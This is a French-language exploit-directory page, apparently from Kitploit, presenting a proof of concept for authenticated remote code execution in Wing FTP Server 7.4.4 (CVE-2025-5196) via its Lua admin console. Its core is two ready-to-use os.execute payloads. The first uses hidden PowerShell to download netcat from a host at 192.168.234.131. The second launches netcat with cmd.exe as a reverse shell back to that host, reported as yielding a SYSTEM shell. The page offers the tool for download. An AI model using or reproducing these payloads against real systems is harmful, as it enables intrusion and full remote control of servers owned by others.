Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Wing-FTP-Server-7.4.4-RCE-Authenticated — Wing FTP Server fournit une console de script Lua administrative accessible via son interface web. Les administrateurs authentifiés sont capables d'exécuter du code Lua arbitraire avec un sandboxing insuffisant. CVE-2025-5196 | Kitploit
Outils/GitHubGitHub/nouvexr/wing-ftp-server-7.4.4-rce-authenticated
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubnouvexr/wing-ftp-server-7.4.4-rce-authenticated

Wing-FTP-Server-7.4.4-RCE-Authenticated

Wing FTP Server fournit une console de script Lua administrative accessible via son interface web. Les administrateurs authentifiés sont capables d'exécuter du code Lua arbitraire avec un sandboxing insuffisant. CVE-2025-5196

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
21il y a 1 anPas encore vérifié

Wing FTP Server 7.4.4 - Exécution de code à distance (Authentifié) (CVE-2025-5196)

Wing FTP Server fournit une console de script Lua administrative accessible via son interface web. Les administrateurs authentifiés peuvent exécuter du code Lua arbitraire avec un sandboxing insuffisant.

Version affectée : Wing FTP Server 7.4.4 (Windows) | Authentification requise : Oui


Téléchargement et Notes de version

Jusqu'au 24 mai 2025, la dernière version de l'application fournie par le vendeur peut être trouvée au lien suivant : https://www.wftpserver.com/download.htm

De plus, on peut noter que jusqu'à la même date, une note de version a été publiée indiquant que la vulnérabilité RCE a été corrigée dans la version 7.4.4. Le lien vers les notes de version se trouve ici : https://www.wftpserver.com/serverhistory.htm image


Preuve de Concept

Preuve de Concept liée à CVE-2025-5196 VulDB image

Wing FTP Server Web Interface

image

image

La première partie de la commande téléchargera nc.exe (netcat pour Windows x86) vers le chemin "C:\Users\usuario\Desktop\Drops". La seconde partie exécutera nc.exe 192.168.234.131 4443 -e cme.exe.

root@kitploit:~
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
root@kitploit:~
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')

image

Shell NT/SYSTEM image

Télécharger l’outil